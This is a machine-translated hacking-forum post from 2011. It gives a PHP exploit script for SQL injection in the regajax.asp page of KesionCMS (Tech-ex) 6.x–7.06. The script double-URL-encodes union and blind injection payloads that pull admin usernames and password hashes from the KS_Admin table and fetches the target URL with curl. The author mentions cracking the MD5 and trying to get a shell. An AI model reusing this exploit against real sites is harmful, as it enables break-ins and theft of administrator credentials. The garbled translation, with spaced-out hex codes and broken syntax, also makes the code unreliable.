Tech-ex kesion 6. x - 7.06 continue to use-vulnerability warning-the black bar safety net

2011-10-22T00:00:00
ID MYHACK58:62201132110
Type myhack58
Reporter 佚名
Modified 2011-10-22T00:00:00

Description

Today with a black wide engage in a edu, it is a sad reminder of the webmaster, some time ago was installed the tech-ex 6. 5, and now directly get your ass kicked. that...

t00ls a large cattle provides the use of the method, I burst the md5, but understand not out···the mssql version of section communications,

Good luck can back up shell what, can not give up the bird. So, online article analysis of the text, write a piece of php that

Local build php+apache, the direct loss tools can be run.

<? php

/*

$str = "' union Select top 1 0 AdminID,UserName&chr(1 2 4)&PassWord From KS_Admin";

for ($i=0; $i<=strlen($str); $i++){

$temp .= "%2 5". base_convert(ord($str[$i]),1 0,1 6);

}

echo $temp." 0";

// http://www.xxxx.com /user/reg/regajax. asp? action=getcityoption&province=%2 5 6 6% 2 5 2 7% 2 5 2 0%256F%2 5 7 2% 2 5 2 0% 2 5 3 1%253D%2 5 3 1% 2 5 0 0 6

// All the information

$id = $_GET['id'];

$url = "http://www.xxxx.com /user/reg/regajax. asp? action=getcityoption&province=";

$param = "f'Or 1=1 and 1=".$ id; // ? id=1

for ($i = 0; $i < strlen($param); $i ++)

{

$temp .= "%2 5". base_convert(ord($param[$i]),1 0,1 6);

}

$url = $url.$ temp."% 2 5 0 0";

//echo $url;

//echo file_get_contents($url);

echo GetSources($url);

function GetSources($Url,$User_Agent=",$Referer_Url=") //fetch a specified page

{

//$Url needs to crawl the page address

//$User_Agent need to return the user_agent information such as“baiduspider”or“googlebot”

$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, $Url);

curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent);

curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

$MySources = curl_exec ($ch);

curl_close($ch);

return $MySources;

} -

?& gt;

Your own look at To modify.

Here there is a problem, php file_get_contents can't get the 5 0 5

The error specific information

It is not an error of the injection, only the blind